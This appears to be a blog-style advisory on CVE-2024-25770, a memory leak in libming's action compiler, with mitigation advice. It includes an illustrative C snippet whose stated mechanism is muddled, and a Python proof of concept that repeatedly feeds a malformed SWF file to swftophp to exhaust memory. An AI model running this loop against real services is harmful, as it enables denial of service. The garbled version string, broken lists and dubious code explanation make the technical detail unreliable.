CVE-2024-25770 - Exploiting the Memory Leak in libming .4.8’s Action Compiler

A new security vulnerability, CVE-2024-25770, was recently revealed in libming (v.4.8), an open-source C library used for parsing and generating SWF (Shockwave Flash) files. This vulnerability is a memory leak found in the action compiler code: /libming/src/actioncompiler/listaction.c. While at first glance a memory leak may not seem dangerous as a buffer overflow or a remote code execution bug, under the right conditions, it can have serious impacts on servers, services, and any application dependent on libming.

In this post, I’ll break down where the leak happens, how it can be triggered, and what a potential exploit might look like. All information here is freshly written for this article.

What is libming?

libming is a C library for creating SWF files. It’s embedded in web servers and content generation tools, and ships as a standalone utility. Although Flash as a platform has declined, plenty of legacy code and file parsers still use libming.

CVE-2024-25770: Where the Leak Lives

### Location: /libming/src/actioncompiler/listaction.c

The vulnerability exists in the way the action compiler (which converts action script to SWF bytecode) handles internal memory allocation while parsing script code.

When parsing a large or malformed SWF file, it does not correctly deallocate memory for certain list objects. Over repeated parsing or under crafted input, this causes unbounded memory consumption—which can ultimately lead to Denial of Service (DoS) by exhausting all server memory.

Let's look at a simplified version resembling the code with the leak

// libming/src/actioncompiler/listaction.c

ActionList* addActionToList(ActionList *list, Action *action) {
    ActionList *new_item = (ActionList *)malloc(sizeof(ActionList));
    if (!new_item) return NULL;

    new_item->action = action;
    new_item->next = NULL;

    if (list) {
        list->next = new_item; // BAD: breaks the chain, leaks memory
        // No proper freeing of previous nodes in case of parse errors!
    } else {
        list = new_item;
    }

    return list;
}

When a parsing error or early exit happens, previously allocated ActionList nodes may not be freed, leaving a trail of leaking memory. If an attacker can feed a crafted SWF or script triggering the error path repeatedly, the server’s memory grows without bound.

Exploiting the Memory Leak

A memory leak alone can be dangerous in long-running services, especially if processing attacker-controlled input. If the parsing is part of an online server or a script run in a loop (e.g., as a thumbnail generator), an attacker could exploit the bug by uploading or forcing processing of multiple bad files.

Exploit Scenario

1. Attacker creates a crafted SWF that causes a parsing error just after some ActionList nodes are allocated.

PoC – Proof of Concept

Here’s a simple proof-of-concept in pseudo-code for a python exploit, using the libming tool as a subprocess:

import subprocess

BAD_SWF = "crashy.swf"

# Create a malformed SWF that triggers memory leaks in libming
with open(BAD_SWF, 'wb') as f:
    # place malformed or oversized data designed to cause parse error after allocation
    f.write(b'FWS' + b'\x08\x00\x00\x00\x00\x00\x00\x00' + b'\xFF'*4096)

# Run the vulnerable utility multiple times
for i in range(10000):
    subprocess.run(['swftophp', BAD_SWF])
    print(f"Attempt {i}")

# Monitor server RAM while running!

Update as soon as a patch is available.

- Avoid parsing untrusted SWF/action script input until then.

Track the issue here:
- libming GitHub issue #261
- Official CVE record

Until fixed

1. Limit accessible RAM for services running libming (use ulimit/systemd cgroups).

Pre-filter SWF uploads by size, content, or other heuristics.

3. Run risky tools in sandboxes (e.g., Docker/jail).

Conclusion

While not as flashy as a remote code execution, CVE-2024-25770 is a classic example of how a “mere” memory leak can have huge repercussions. Modern attackers rely on simple bugs—like repeated memory leaks—to take down services and cause headaches for admins.

If libming’s part of your stack, audit your flows, upgrade ASAP, and don’t trust any input you don’t generate yourself.

References

- Official CVE entry – CVE-2024-25770
- libming GitHub repository
- libming vulnerable code diff PR
- Memory leaks explained (OWASP)

Timeline

Published on: 02/26/2024 18:15:07 UTC
Last modified on: 08/09/2024 15:35:02 UTC